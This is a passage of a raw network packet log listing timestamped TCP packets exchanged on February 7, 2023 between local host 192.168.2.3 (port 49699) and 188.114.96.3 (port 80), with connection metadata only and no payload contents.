                                                                                    Feb 7, 2023 19:45:01.845755100 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845767021 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845794916 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845807076 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845833063 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845846891 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845875025 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845886946 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845916033 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.845933914 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845968962 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.845997095 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846009016 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846036911 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846048117 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846076012 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846092939 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846122026 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846142054 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846179008 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846208096 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846219063 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846250057 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846257925 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846276999 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846296072 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846323967 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846338987 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846368074 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846388102 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846422911 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846451044 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846462011 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846487999 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846499920 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846527100 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846539974 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846569061 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846585989 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846621037 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846647978 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846662045 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846688032 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846762896 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846796036 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846817970 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846849918 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846873045 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846905947 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846935034 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846946001 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.846971989 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.846985102 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847011089 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847023964 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847052097 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847064972 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847095013 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847121000 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847157955 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847186089 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847202063 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847230911 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847250938 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847285986 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847312927 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847326994 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847353935 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847364902 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847392082 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847405910 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847434998 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847456932 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847491980 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847520113 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847532034 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847559929 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847585917 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847618103 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847636938 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847662926 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847676992 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847702026 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847714901 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847743034 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847765923 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847799063 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847826958 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847841024 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847870111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847892046 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847929001 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847955942 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.847970009 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.847995996 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848007917 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848033905 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848048925 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848076105 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848098993 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848130941 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848157883 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848172903 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848201990 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848222017 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848256111 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848284960 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848297119 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848323107 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848336935 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848362923 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848376989 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848404884 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848417044 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848443985 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848457098 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848485947 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848507881 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848536968 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848565102 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848577976 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848607063 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848618031 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848647118 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848676920 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848690033 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848717928 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848728895 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848756075 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848768950 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848797083 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848809958 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848836899 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848864079 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848864079 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848882914 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848910093 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848922014 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848951101 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.848963022 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.848988056 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849014997 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849028111 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849054098 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849066973 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849092960 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849108934 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849134922 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849148989 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849175930 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849191904 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849219084 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849230051 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849255085 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849268913 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849294901 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849307060 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849332094 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849345922 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849371910 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849384069 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849411011 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849426031 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849455118 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849466085 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849494934 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849523067 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849534988 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849561930 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849575043 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849601984 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849616051 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849642992 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849658966 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849687099 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849699020 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849725962 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849741936 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849775076 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849803925 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849818945 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849845886 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849860907 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849889040 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849905014 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849931955 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.849946022 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.849998951 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850025892 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850039959 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850065947 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850078106 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850106001 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850117922 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850143909 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850158930 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850188971 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850218058 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850230932 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850256920 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850270987 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850297928 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850312948 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850337982 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850353003 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850379944 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850393057 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850420952 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850447893 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850461006 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850495100 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850507021 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850534916 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850564003 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850578070 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850603104 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850616932 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850645065 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850658894 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850686073 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850716114 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850744963 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850771904 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850786924 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850814104 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850827932 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850855112 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850866079 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850892067 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850903988 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850933075 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.850963116 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.850975037 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851001978 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851013899 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851041079 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851052999 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851079941 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851094007 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851121902 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851149082 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851162910 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851188898 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851202965 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851229906 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851243973 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851273060 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851288080 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851313114 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851342916 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851356030 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851383924 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851412058 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851423025 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851452112 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851479053 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851492882 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851520061 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851547003 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851560116 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851588011 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851613998 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851628065 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851655960 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851682901 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851700068 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851728916 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851753950 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851753950 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851774931 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851802111 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851815939 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851845980 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851874113 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851890087 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851917028 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851943016 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.851958036 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.851984978 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852010965 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852025032 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852052927 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852080107 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852092981 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852119923 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852150917 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852161884 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852190018 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852205992 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852231979 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852245092 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852271080 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852283001 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852309942 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852324009 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852354050 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852364063 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852391958 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852420092 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852432013 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852458000 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852471113 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852497101 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852511883 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852538109 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852550983 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852577925 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852591038 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852617979 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852631092 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852658033 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852672100 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852699041 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852725983 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852737904 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852763891 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852777958 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852803946 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852818012 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852844000 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852857113 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852881908 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852895975 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852922916 CET4969980192.168.2.3188.114.96.3
                                                                                    Feb 7, 2023 19:45:01.852936983 CET8049699188.114.96.3192.168.2.3
                                                                                    Feb 7, 2023 19:45:01.852963924 CET4969980192.168.2.3188.114.96.3
